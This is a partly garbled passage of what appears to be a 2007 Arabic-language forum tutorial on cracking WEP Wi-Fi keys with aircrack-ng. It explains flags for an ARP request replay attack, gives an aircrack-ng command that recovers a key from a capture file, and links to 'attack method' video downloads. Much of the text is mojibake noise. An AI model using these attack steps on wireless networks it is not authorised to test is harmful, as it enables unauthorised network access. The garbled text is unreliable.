--arpreplay : attack mode (ARP request replay)
-b          : MAC address of the access point
-h          : MAC address of our card
ath0        : our interface name
(3) increase the packets `qqEE٣FqqTq m{אqq )qq& "_)אqqWqqqq!5qq5אE١FqqTqq m*[אqq@qq4qqa K8ZR(R.[א5<)אD
(4) aircrack-ng
OD אi!`EU({<=|אk1
aircrack-ng -b 00:14:6C:1A:98:8C output.cap

-b         : MAC address of the access point
output.cap : the capture file
( 5[)Y-א,( אv@*V!)אr!"<=א XEא ±7m=אאV EM"M'אE|אS"J(@'אא K+אN"M[RW-א8!"#$ ()|א1
lmא
)qqW(4qq ،qqEF'אDqqאא#qqZ[אqq א8qqV*qq""*qqERqq(V!9:8!אqqZ:*qq%" K&&"<=אא)}(&! [<=אאD"_)אW4(kLp-eTOa5eM"k X(qq {qq 0qqe()qqe,qq)qqW(()qq 4qq54Dqq })qq=אאqq<vDqq qq6)qq W <=א"אz1<)oV@Xאij/א

Attack-method 1 ( 124 MB )
http://www.4shared.com/file/24526019/8831b5f1/attackmethod1part1.html?dirPwdVerified=630ebe35 (50 MB)
http://www.4shared.com/file/24546586/40c72462/attackmethod1part2.html?dirPwdVerified=630ebe35 (50 MB)
http://www.4shared.com/file/24548769/ada0b720/attackmethod1part3.html?dirPwdVerified=630ebe35 (24 MB)

Attack-method 2 ( 113 MB )
http://www.4shared.com/file/24553904/65b4efa0/attackmethod2part1.html?dirPwdVerified=24884433 (50 MB)
http://www.4shared.com/file/24590482/9b931121/attackmethod2part2.html?dirPwdVerified=24884433 (50 MB)
http://www.4shared.com/file/24592271/2b86e86d/attackmethod2part3.html?dirPwdVerified=24884433 (13 MB)

`א#qq$_[אFq &eqqאu"א4qq-א0qq!SKK qqtאאJ*qqiqq\*0qqWא8!אqqZ:4qq5qqzqq*lM KJ*qq 0W c1 {qq *-=אאqq<qq"" אDqq($}qq*אDqq($qq"qqE"0qq1 אzqq%(qq*אqqENqq( =אq<`Fq0667qzq1q א8q~א8ZS;1)"אD 9& &)@א0WM8!e(א xqqZM}"R[ ruqq 5אqq!"،vqqj*{"אqqeאi"אR0qqzqq*lM qqtאא4Dqq 0qqWאZ:"+qqא KKKKK " א1iF"א
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
)א6+א :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
q<١٤٢٨Lr١٢
( September 23, 2007 )
-------------------------------
8!"#$א+א67 ----------------------------------------------------------------
aLT3rEQ$Hacker ------------------------------------------------------------------